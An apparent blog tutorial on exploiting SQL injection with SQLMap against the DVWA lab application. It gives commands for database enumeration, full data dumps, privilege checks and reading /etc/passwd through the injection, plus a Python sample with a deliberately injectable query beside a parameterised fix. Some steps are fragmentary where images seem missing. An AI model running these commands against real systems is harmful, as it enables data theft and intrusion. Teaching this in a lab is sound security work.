SQL INJECTION (using SQLMap)

Exploiting SQL Injection:


In this post we are going to use a tool that exploits SQL injection flaws; the tool is called SQLMap.
It is a powerful and versatile tool with a wide array of features, some of which are:
  1. Error-based injection
  2. Blind injection
  3. Time-based injection
  4. Stacked queries


Install it:


Introduction to SQLMap:
For the demonstrations I have used the open source application DVWA.
It takes a GET parameter named id and displays ID, First name and Surname.
For /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# it displayed the first user.
→ If we increment the id parameter we will see a different ID, First name and Surname.


So what I have done here is, I have captured the request in Burp Suite (will explain in another post) and copied the request to a text file named d.txt.

Let's try SQLMap and check whether it is exploitable or not:
./sqlmap.py -r d.txt




  1. We get that the GET parameter id might be vulnerable to XSS
  2. The back-end DBMS is MySQL
  3. The GET parameter 'id' is vulnerable.
When detection is over, SQLMap shows a variety of ways to exploit the flaw.
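To see why SQLMap can confirm the id parameter as injectable, here is an added example (it is neither DVWA's code nor SQLMap's) that uses a constructed in-memory SQLite table in place of the DVWA users table: the first lookup builds the query the way a vulnerable page does, the second validates and parameterises the same input.

```python
import sqlite3

def make_db():
    # Constructed stand-in for DVWA's users table (not DVWA's real schema or data).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")])
    return con

def lookup_vulnerable(con, user_id):
    # The pattern SQLMap exploits: the GET parameter is pasted straight into the
    # SQL string, so a quote inside it ends the literal and becomes SQL syntax.
    sql = f"SELECT user_id, first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()

def lookup_hardened(con, user_id):
    # Fix 1: allow-list the input. The page shows id is always a positive integer,
    # so anything else is rejected (a real handler would answer 400 Bad Request).
    if not str(user_id).isdigit():
        return None
    # Fix 2: bind the value as a parameter; the DBMS never parses it as SQL,
    # so neither error-based, blind nor time-based techniques have anything to drive.
    sql = "SELECT user_id, first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (int(user_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    tautology = "1' OR '1'='1"          # classic test input; constructed here
    print("vulnerable, id=2       :", lookup_vulnerable(db, "2"))
    print("vulnerable, tautology  :", lookup_vulnerable(db, tautology))
    print("hardened,   id=2       :", lookup_hardened(db, "2"))
    print("hardened,   tautology  :", lookup_hardened(db, tautology))
```

The vulnerable path returns every row for the tautology input, which is exactly the kind of response difference SQLMap's detection phase looks for; the hardened path rejects it before any query runs.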

Dumping the data in an error-based scenario:


Using --dbs, we can see the list of databases present on the DBMS.




Once we have the list of databases, we select dvwa and dump out the tables present inside it.
SQLMap provides the --tables switch to list them, but it must be used together with the -D switch, which tells it which database to choose while dumping.


We have extracted (dumped) the data from the table.
We can use -C to dump a specific column from the table, but first let us print the column names.
Then we select the particular column:


→ TO DUMP EVERYTHING: python sqlmap.py -r r.txt --dump-all


Interacting with the Wizard:
There is an interactive setup wizard where SQLMap asks for things in detail, one by one, starting with the injection URL.
Some data left.


SQLMap and URL rewriting:






Speeding up the process!


Multi-threading:
By default SQLMap runs only a single thread, which is slow. We can use the --threads switch and specify the number of threads, which ranges from 1 to 10. Increasing the number of threads increases the overall performance of SQLMap.


Let's try it out: first we simply dump all the tables from the database dvwa without threads and note the time.
Note: the time utility is used to track and monitor the elapsed time.


Command: → time python sqlmap.py -r r.txt -D dvwa --dump
Command: → time python sqlmap.py -r r.txt -D dvwa --dump --threads 3


DUMPING the data in blind and time-based scenarios:
Command → python sqlmap.py -r blind.txt




time python sqlmap.py -r blind.txt -D dvwa -T users --dump
time python sqlmap.py -r blind.txt -D dvwa -T users --dump --predict-output
→ this is done to reduce the time taken


python sqlmap.py -r blind.txt --privileges
You can see in the image that the user has the FILE privilege, so we can utilize this to read/write files through the injection if the file system permissions allow it; on Linux, MySQL runs as a separate user account, and it is that account which reads/writes files on the file system.


python sqlmap.py -r blind.txt --file-read=/etc/passwd

